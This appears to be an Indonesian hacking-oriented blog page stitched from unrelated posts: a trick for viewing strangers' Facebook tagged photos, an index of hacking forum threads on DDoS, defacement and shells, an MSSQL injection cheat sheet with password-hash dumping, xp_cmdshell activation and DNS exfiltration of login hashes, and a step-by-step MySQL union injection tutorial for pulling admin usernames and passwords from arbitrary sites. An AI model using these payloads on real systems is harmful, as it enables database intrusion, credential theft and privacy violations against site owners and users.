Latest Entries »

Hack Facebook Photos

:: Trick 1 ::

1. Log into facebook account.

2. Find the person’s unique profile ID.

- Search for them and click view friends or send message.

- Write the unique ID from the address bar (only the numbers) or copy it in notepad.

3. Now that you have your unique profile ID you can use the next two links to view a total of 40 tagged photos:

If you wish to see tagged photos added by others use this link:

Code:

Firefox CCPB

FIREFOX CCPB 3.6.3
wah bagi siapa yg mau download firefox terbaru……

firefox ini sudah di lengkapi add-ons bro…
berikut ini yg sudah terpasang di firefox CCPB:

add-ons:

fasterfox

cookieswap
greasemonkey
stylish
xmarks
addblock
addblock flush
facebook chatbar
flashGot
java console

kaskus menu
tap progres bar

juga dilengkapi plugin gann….

download

http://www.mediafire.com/?f31p8965ph842bt

Oke,thread ini biar mudah mencari thread di bagian HACKING … dalam hal ini gue bagi Tiga Kategori … ok langsung aja ya :

Kategori Hacking website

Hacking For Newbie ( asp forum ) by Man In Black

Download Koneksi.php??? by Flamesofhell

Web Hack Pake Linux By edelweize

Memanfaatkan rapidleech Buat Hacking By Bobihikaru

Ddos online By Bobyhikaru

Yang habis dihajar ma boby nih…By mogsaw newbie

Dork C99 .php By Bobihikaru

kategori Hacking Tips

Beberapa cara yang di pakai hacker handal by bobihikaru

definisi DDOS ama embel2nya

Cara Mudah Nge DEFACE by Man In Black

Google Hacking By Man In Black

Email palsu By Reynold Erwandi

Tampang Hacker Yang Terkenal By oklyn

Cara dan Jenis Hacker Menyerang Situs. By Man In Black

Hack Facebook Photos By Man In Black

Tutor hack warnet Magina Muhardi

account rapid By cah surip

Mengakses Registry dari Comand Prompt By Ichito-Bandito

Manual Send Email dengan Port SMTP By Ijoo

Langkah Sederhana Buat Deface By Man In Black

Newshell In IH By Bobihikaru

Shell Shell By Bobihikaru

BD ( Backdoor ) yang aneh… By SyNTaX ErRoR

Hacking – Hacking shell via FTP By Man In Black

Hack with CMD By ne0 d4rk fl00d3r

[Manfaat Shell]Membuat Socks 5 By dikewel

Cara Membobol Password dan Solusi Menangkalnya By MISTERFRIBO

Apa Ini??? ( ini frame buat menangkal DDOS biasa punya maling sit ) By bl4ck_sh4d0w

simulasi hacking By yudha bubunaro ( game hacking ini )

Tutor Jhon The Ripper By edelweize

Google dorks By Bobihikaru

kategori Hacking Komputer dll

Hack Lift or Elevator By Bobihikaru

Nembak IP dari Jauh ! DDOS By Bobihikaru

Hacking MumSMS Apps For Symbian Mobile ( Tested On Nokia S60) By metropolix

Teknik Hacking Cyber Billing dan Billing Explorer By dedesaputra

untung gue punya back up …. gue stick lagi ahh

——————-
Version
——————-
SELECT @@version

————————
Comments
————————

SELECT 1 — comment
SELECT /*comment*/1

————————–
Current User
————————-
SELECT user_name();
SELECT system_user;
SELECT user;

SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

—————————————
List Users
—————————————
SELECT name FROM master..syslogins

—————————————
List Password Hashes
—————————————

SELECT name, password FROM master..sysxlogins — priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;
SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005

—————————————
List Privileges
—————————————
null

—————————————
List DBA Accounts
—————————————
TODO
SELECT is_srvrolemember(‘sysadmin’); — is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try ‘bulkadmin’, ‘systemadmin’ and other values from the documentation
SELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.

—————————————

Current Database
—————————————
SELECT DB_NAME()

—————————————
List Databases
—————————————
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …

—————————————
List Columns
—————————————
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable

—————————————
List Tables
—————————————

SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable

—————————————
Find Tables From Column Name
—————————————
– NB: This example works only for the current database. If you wan’t to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’

————————————–
Select Nth Row
————————————-
SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row

————————————–
Select Nth Char
————————————-

SELECT substring(‘abcd’, 3, 1) — returns c

————————————–
Bitwise AND
————————————-
SELECT 6 & 2 — returns 2
SELECT 6 & 1 — returns 0

————————————–
ASCII Value -> Char
————————————-
SELECT char(0×41) — returns A

————————————–
Char -> ASCII Value

————————————-
sELECT ascii(‘A’) – returns 65

————————————–
Casting
————————————-
SELECT CAST(’1′ as int);
SELECT CAST(1 as char)

————————————–
String Concatenation
————————————-
SELECT ‘A’ + ‘B’ – returns AB

————————————-
If Statement
————————————-
IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1

————————————-
Case Statement
————————————-
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1

————————————-
Avoiding Quotes
————————————-

SELECT char(65)+char(66) — returns AB

————————————-
Time Delay
————————————-
WAITFOR DELAY ’0:0:5′ — pause for 5 seconds

————————————-
Make DNS Requests

————————————-
declare @host varchar(800); select @host = name FROM master..syslogins; exec(‘master..xp_getfiledetails ”\\’ + @host + ‘\c$\boot.ini”’); — nonpriv, works on 2000

declare @host varchar(800); select @host = name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) + ‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist ”\\’ + @host + ‘\c$\boot.ini”’); — priv, works on 2005

– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
– Also check out theDNS tunnel feature of sqlninja

————————————-
Command Execution

————————————-
EXEC xp_cmdshell ‘net user’; — priv

On MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:
EXEC sp_configure ‘show advanced options’, 1; — priv
RECONFIGURE; — priv
EXEC sp_configure ‘xp_cmdshell’, 1; — priv
RECONFIGURE; — priv

————————————-
Local File Access
————————————-
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM ‘c:\boot.ini’;
DROP TABLE mydata;

————————————-
Hostname, IP Address

————————————-
SELECT HOST_NAME()

————————————-
Create Users
————————————-
EXEC sp_addlogin ‘user’, ‘pass’; — priv

————————————-

Drop Users
————————————-
EXEC sp_droplogin ‘user’; — priv

————————————-
Make User DBA
————————————-
EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin; — priv

————————————-
Location of DB files
————————————-
TODO

————————————-
Default/System Databases
————————————-

northwind
model
msdb
pubs
tempdb

Reference : pentestmonkey.net

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ‘ atau -
comments: /* atau –
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========

=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100′ atau
[site]/berita.php?id=-100

ehingga muncul pesan error seperti berikut (masih bnyak lagi):

==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by

contoh:

[site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)…
misal:

[site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–

[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

sehingga muncul error atau hilang pesan error…
misal: [site]/berita.php?id=-100+order+by+9–

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8–

===========

=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi

misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+inf ormation_schema.tables–

seumpama table yang muncul adalah “admin”

===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi

perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()–

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa– >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa–

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E–

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin–

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .

Silahkan DI pelajari Kaka 1 .

Cara Buat Spoiler Di WordPress

Tahu spoiler kan? Semacam tombol yang ketika di-klik akan mengeluarkan menu pulldown. Biasanya digunakan untuk menyimpan teks yang terlalu panjang atau semacam lampiran yg sifatnya opsional dilihat atau tidak.
Dapat info dari kaskus tentang bagaimana membuat spoiler. Bisa cek code berikut:

TEKS YG MAU DIUMPETIN

Lihat tulisan yang di-bold. Tulisan “tampilkan” dan code warna CSS bisa diganti sesuai warna themes kita. Bagian yang mau di-hidden di bagian “TEKS YG MAU DIUMPETIN” bisa diisi gambar atau tulisan. Untuk implementasinya sebagai berikut:

Blog at WordPress.com. | The Motion Theme.
[ Back to top ]
Follow

Get every new post delivered to your Inbox.